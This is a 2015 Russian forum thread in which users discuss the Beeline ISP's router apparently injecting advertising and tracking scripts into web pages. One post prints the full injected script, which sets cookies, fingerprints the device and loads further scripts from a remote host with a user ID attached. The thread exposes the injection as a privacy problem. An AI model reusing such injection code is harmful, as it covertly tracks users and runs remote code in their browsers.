|
Страница 1 из 1
|
[ Сообщений: 7 ] |
|
Билайн вмешивается в трафик пользователей
| Автор |
Сообщение |
|
MOT®OSS
Друг треккера
Раздал: 58.47 ТБ
Скачал: 3.05 ТБ
Ратио: 19.201
Зарегистрирован: 2014-06-18 09:21
Сообщения: 5236
Откуда: CCCP
|
Билайн
вмешивается в трафик пользователей
История встраивания провайдером своих скриптов в посещаемые сайты не нова...
Сегодня обнаружил аналогичную вставку у Билайна («Домашний интернет).
Прямо через их фирменный роутер.
Попробуйте набрать в браузере 192.168.1.1/scwn.js. Что-нибудь есть? Напоминаю, что 192.168.1.1 — это ip вашего роутера. [center]Производитель Sercomm
Модель Smart Box
Версия ПО v2.0.26
Recovery Version v2.0.19
Дата релиза ПО 2015-04-16, 04:33:58
Метка релиза ПО SERCOMM.BEELINE
Версия оборудования v2
Версия загрузчика 1.05 [/center] Загружаем любой сайт (ну, например,[color=#006699] lenta.ru) и видим[/color] Да, все верно — загружается сторонний скрипт
(и вот что-то я совсем не уверен в надежности и безопасности указанного ресурса).
Думаю не стоит объяснять, что это небезопасно и нарушает мои гражданские права (юристы поправьте меня, если не прав).
По сути провайдер встраивает в посещаемые мною сайты свой блок кода, который теоретически (да, думаю, и практически) собирает информацию о посещениях, показывает рекламу и т.д.
Если тут есть представители Билайна, то неплохо было бы прояснить ситуацию.
Да и вообще — это нормально?
Update: Ссылка из скрипта ведет на сервис для размещения рекламы в зонах свободного wifi — wifly.net
Update: Небольшое расследование привело к интересной информации о наличии специальной прошивки для данного роутера, которая и реализует данную уязвимость — ru.wiflyad.net/flyadbox.html
|
| 2015-07-15 06:27 |
|
|
|
Гость
|
Да, провайдеры вообще охринели ! Куда бедному крестьянину податься? Везде слежка !!!
|
| 2015-07-15 08:50 |
|
|
|
insalea
Тех. Администратор
Раздал: 30.18 ТБ
Скачал: 239.15 ГБ
Ратио: 277.721
Зарегистрирован: 2014-11-14 00:39
Сообщения: 124
|
Я тебя может быть разочарую, но у меня ничего нет. А если набрать192.168.1.1/scwn.js., то  | | | | Код: if(!window.WebNotifier){window.WebNotifier={vlCoreRoot:0,vlCorePlatform:0,vlCoreHost:'',vlCoreMAC:0,vlCoreActiveTab:1,vlInitLoad:10,vlUserID:'',afnOnActivate:[],afnOnDeActivate:[],fnCoreSetCookie:function(n,v,e){v=escape(v);if(e){var d=new Date();d.setTime(d.getTime()+e*1000);v+='; expires='+d.toUTCString();};document.cookie=n+"="+v;},fnCoreGetCookie:function(n){var a=document.cookie.split(';');var i;var j;for(i=0;i<a.length;i++){j=a[i].indexOf('=');if(a[i].substr(0,j).replace(/^\s+|\s+$/g,'')==n)
return unescape(a[i].substr(j+1));};return null;},fnCoreCB:function(){var e=event?event:window.event;if(window.event)
e.cancelBubble=true;else
e.stopPropagation();return false;},fnCoreGet:function(u,c,f,p){var s=document.createElement('script');;var h=document.head||document.getElementsByTagName('head')[0]||document.documentElement;if(s&&h){s.async='async';s.charset='UTF8';var l='http://'+window.WebNotifier.vlCoreHost+u;if(!/^\/core\w\.js\?v=(\d+)$/i.test(u)&&!/^\/auth.js(\?.+)?$/i.test(u))
l+=(/\?/.test(u)?'&':'?')+'uid='+encodeURIComponent(window.WebNotifier.vlUserID)+'&pl='+encodeURIComponent(window.WebNotifier.vlCorePlatform)+(c?('&_='+Math.random()):'');s.src=l;s.__cb=f;s.__cbp=p;s.__cbd=1;s.onload=function(){if(this.__cbd){this.__cbd=0;this.onload=null;if(this.__cb)
this.__cb(this.__cbp);this.parentNode.removeChild(this);}};s.onreadystatechange=function(){if((this.__cbd)&&((this.readyState=='loaded')||(this.readyState=='complete'))){this.__cbd=0;this.onreadystatechange=null;if(this.__cb)
this.__cb(this.__cbp);this.parentNode.removeChild(this);}};h.insertBefore(s,h.firstChild);}},fnCoreSave:function(p,v,t){window.WebNotifier.fnCoreGet('/save.js?p='+encodeURIComponent(p)+'&v='+encodeURIComponent(v)+(t?('&t='+t):''),1);},fnCoreAE:function(o,e,f){if(!o)
return;if(o.addEventListener)
o.addEventListener(e,f,false);else
o.attachEvent('on'+e,f);},fnCoreGo:function(u){window.open(u,'_self');},fnCoreGoNew:function(u){window.open(u,'_blank');},fnCoreGoPrev:function(){document.referrer?window.open(document.referrer,'_self'):window.history.back();},fnCoreAccept:function(o){window.WebNotifier.fnCoreGet('/update.js?accept'+(o?('&url='+encodeURIComponent(o)):''),1);},fnInitLoad:function(){if(!window.WebNotifier.vlCoreRoot){if(--window.WebNotifier.vlInitLoad)
setTimeout(window.WebNotifier.fnInitLoad,200);return;}
window.WebNotifier.fnCoreGet('/init.js',1);},fnInit:function(){if(!document.body){setTimeout(window.WebNotifier.fnInit,100);return;}
if(document.getElementById('WebNotifierDoNotShow'))
return;var p='d.js?v=1';if(window.WebNotifier.vlCorePlatform){if(window.WebNotifier.vlCorePlatform==1)
p='t.js?v=1';else
p='m.js?v=1';}else if(!/opera[\W\D]\d+\./i.test(navigator.userAgent)&&/msie\s\d+\./i.test(navigator.userAgent))
p='w.js?v=1';window.WebNotifier.fnCoreGet('/core'+p,0,window.WebNotifier.fnInitLoad);},fnInitTest:function(){if((/\sandroid\s+[012]\.\d+/i.test(navigator.userAgent))||(!/opera[\W\D]\d+\./i.test(navigator.userAgent)&&/msie\s[23456]\./i.test(navigator.userAgent))||(/windows\s+phone\s+(os\s+)?[0-7]\./i.test(navigator.userAgent)))
return;var s=document.getElementsByTagName('script');var z;for(var x in s)
if(s[x].src&&(s[x].src!==undefined)&&(z=s[x].src.match(/^http\:\/\/([^\/]+)\/wn\.js\?v\=\d+/)))
window.WebNotifier.vlCoreHost=z[1];if(window.WebNotifier.vlCoreHost=='')
return;var im=(function(a){return(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)));})(navigator.userAgent||navigator.vendor||window.opera);var it=/\Wtablet|android|ipad|gt\-(p5100|n5100|n8000|p3100|p3110|p6800|p3113|p7300)\W/i.test(navigator.userAgent);if(it&&!im){window.WebNotifier.vlCorePlatform=1;}else if(im){window.WebNotifier.vlCorePlatform=2;}else{window.WebNotifier.vlCorePlatform=0;}
window.WebNotifier.fnCoreGet('/auth.js',0,function(){window.WebNotifier.fnCoreGet('/update.js?loaded',1,window.WebNotifier.fnInit);});}};if(window.top==window.self)
window.WebNotifier.fnInitTest();} | | | | |
Не будет у тебя wifly и тд. По сути, пчелайн не виноват в том, что у тебя стоит сторонняя прошивка.
|
| 2015-07-21 00:18 |
|
|
|
MOT®OSS
Друг треккера
Раздал: 58.47 ТБ
Скачал: 3.05 ТБ
Ратио: 19.201
Зарегистрирован: 2014-06-18 09:21
Сообщения: 5236
Откуда: CCCP
|
Ты меня не разочаруешь по-любому..
Во - первых,я пользователь РосТелекома,
Во-вторых,пользуюсь только прошивками с оф.сайта,
В -третьих,информация предоставлена для ознакомления и она никак не говорит о том,что данная проблема присутствует у всех пользователей Билайна.
|
| 2015-07-22 02:23 |
|
|
|
insalea
Тех. Администратор
Раздал: 30.18 ТБ
Скачал: 239.15 ГБ
Ратио: 277.721
Зарегистрирован: 2014-11-14 00:39
Сообщения: 124
|
Ну ты был абоном билайна, поэтому я тебе и писал это. Во-вторых, не знаю как эта байда попала к тебе, но в оф прошивке такого нет. Может Вам дают роутеры такие, хз...
|
| 2015-07-22 12:38 |
|
|
|
MOT®OSS
Друг треккера
Раздал: 58.47 ТБ
Скачал: 3.05 ТБ
Ратио: 19.201
Зарегистрирован: 2014-06-18 09:21
Сообщения: 5236
Откуда: CCCP
|
Покупает человек роутер,за свои кровные,приходят их "спецы" и пытаются прошить твой,личный роутер их прошивкой,которую потом калёным железом нужно выжигать,сам был свидетелем этого безобразия (TRENDnet в моём случае тогда ),а причина банальна,якобы они не могут разобраться в англицком меню веб-интерфейса
|
| 2015-07-23 05:56 |
|
|
|
insalea
Тех. Администратор
Раздал: 30.18 ТБ
Скачал: 239.15 ГБ
Ратио: 277.721
Зарегистрирован: 2014-11-14 00:39
Сообщения: 124
|
Эм, они совсем что ли ку ку? Чего там разбираться то? Гнать в шею таких спецов....
|
| 2015-07-23 13:38 |
|
|
|
|
Страница 1 из 1
|
[ Сообщений: 7 ] |
|
Кто сейчас на конференции |
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2 |
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения
|
|
